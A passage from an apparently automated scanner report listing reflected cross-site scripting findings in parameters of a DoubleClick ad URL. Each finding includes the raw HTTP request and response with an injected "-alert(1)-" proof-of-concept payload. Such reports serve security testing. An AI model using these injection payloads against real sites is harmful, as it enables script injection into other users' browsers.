User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7190

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
7246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.comabc97"-alert(1)-"306082136f6&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet?CPID=STBANNAUSFY12Q1000000140300000310128004BAN201");
var fscU
...[SNIP]...

3.181. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [pg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce2ce"-alert(1)-"9cfe988ae87 was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAXce2ce"-alert(1)-"9cfe988ae87&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7205

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAXce2ce"-alert(1)-"9cfe988ae87&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet?CPID=STBANNAUSFY12Q1000000140300000310128004BAN181");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque"
...[SNIP]...

3.182. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1cb6"-alert(1)-"d5ee076476 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=a1cb6"-alert(1)-"d5ee076476&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7186

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
7-300/250%3B41900386/41918173/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=a1cb6"-alert(1)-"d5ee076476&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06
...[SNIP]...

3.183. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [pp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 703d6"-alert(1)-"b48e245097a was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100703d6"-alert(1)-"b48e245097a&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7193

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
1748593/41766380/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100703d6"-alert(1)-"b48e245097a&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/htt
...[SNIP]...

3.184. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [ppartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e695"-alert(1)-"df34e3faf88 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=8e695"-alert(1)-"df34e3faf88&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7205

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=8e695"-alert(1)-"df34e3faf88&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet?CPID=STBANNAUSFY12Q1000000140300000310128004
...[SNIP]...

3.185. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [pt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b99c1"-alert(1)-"37925af0b26 was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328b99c1"-alert(1)-"37925af0b26&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7205

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
61926988%3B4307-300/250%3B41900699/41918486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328b99c1"-alert(1)-"37925af0b26&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.
...[SNIP]...

3.186. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [ra parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e784"-alert(1)-"614b3ef8fb was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.2438e784"-alert(1)-"614b3ef8fb&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7302

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.2438e784"-alert(1)-"614b3ef8fb&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet/?CPID=STBANNAUSFY12Q1000000140300000310128004BAN074");
var fscUrl = url;
var fscUrlClickTagFound
...[SNIP]...

3.187. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [rqid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ee2e"-alert(1)-"625b1fe02f was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F8204981ee2e"-alert(1)-"625b1fe02f&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7302

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F8204981ee2e"-alert(1)-"625b1fe02f&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet/
...[SNIP]...

3.188. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [sg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4e31"-alert(1)-"b2055b50289 was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421e4e31"-alert(1)-"b2055b50289&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7190

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
t/click%3Bh%3Dv8/3af6/17/166/%2a/w%3B240097948%3B2-0%3B0%3B61926988%3B4307-300/250%3B41900386/41918173/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421e4e31"-alert(1)-"b2055b50289&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&co
...[SNIP]...

3.189. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bed07"-alert(1)-"256a1270d98 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3bed07"-alert(1)-"256a1270d98&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7205

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
0%3B0%3B61926988%3B4307-300/250%3B41900699/41918486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3bed07"-alert(1)-"256a1270d98&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX
...[SNIP]...

3.190. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e42f7"-alert(1)-"fff3f79dcc6 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

